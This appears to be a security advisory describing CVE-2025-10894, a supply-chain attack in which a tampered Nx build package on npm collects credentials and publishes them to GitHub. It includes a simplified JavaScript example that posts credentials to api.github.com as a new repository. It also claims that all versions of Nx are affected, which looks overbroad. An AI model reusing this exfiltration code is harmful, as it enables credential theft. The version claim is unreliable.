Overview
The Common Vulnerabilities and Exposures (CVE) system has recently disclosed a high-risk vulnerability, identified as CVE-2025-10894, that affects the Nx build system package and several related plugins. This vulnerability is of particular significance due to its potential for system compromise and data leakage, posing a severe threat to users’ data privacy and system security.
The malicious code was inserted via a supply-chain attack, a sophisticated method where an adversary infiltrates a software supply chain to exploit downstream systems. In this case, the tampered package was published to the npm software registry, a widely utilized platform for JavaScript software packages, further increasing the potential impact.
Vulnerability Summary
CVE ID: CVE-2025-10894
Severity: Critical (CVSS 9.6)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise, data leakage
Affected Products
| Product | Affected Versions |
|---|---|
| Nx Build System | All versions |
| Related Nx Plugins | All versions |
How the Exploit Works
The exploit works by leveraging the compromised Nx build system package or its related plugins. Once the tampered package is installed, the malicious code becomes active within the user’s system. The code is designed to scan the file system, collecting sensitive credentials. These credentials are then posted to GitHub under the user’s accounts in the form of a new repository, potentially exposing sensitive data to malicious actors.
Conceptual Example Code
Consider the following conceptual example of how this exploit might look in action:
```javascript
const fs = require('fs');
const https = require('https');

const scanFileSystem = () => {
  // Conceptual placeholder: in the real attack this step would scan the
  // file system and collect credentials, returning them as an array.
  return [];
};

const postToGithub = (credentials) => {
  const options = {
    hostname: 'api.github.com',
    path: '/user/repos',
    method: 'POST',
    headers: { 'Content-Type': 'application/json' }
  };
  const req = https.request(options, (res) => {
    // Handle response
  });
  const data = {
    name: 'leaked-credentials',
    description: 'Repo containing stolen credentials',
    credentials
  };
  req.write(JSON.stringify(data));
  req.end();
};

const credentials = scanFileSystem();
postToGithub(credentials);
```
This JavaScript code illustrates the attack conceptually, where the malicious code scans the system for credentials and then posts them to GitHub. This example is oversimplified and does not include error handling or other complexities that would be present in a real-world scenario.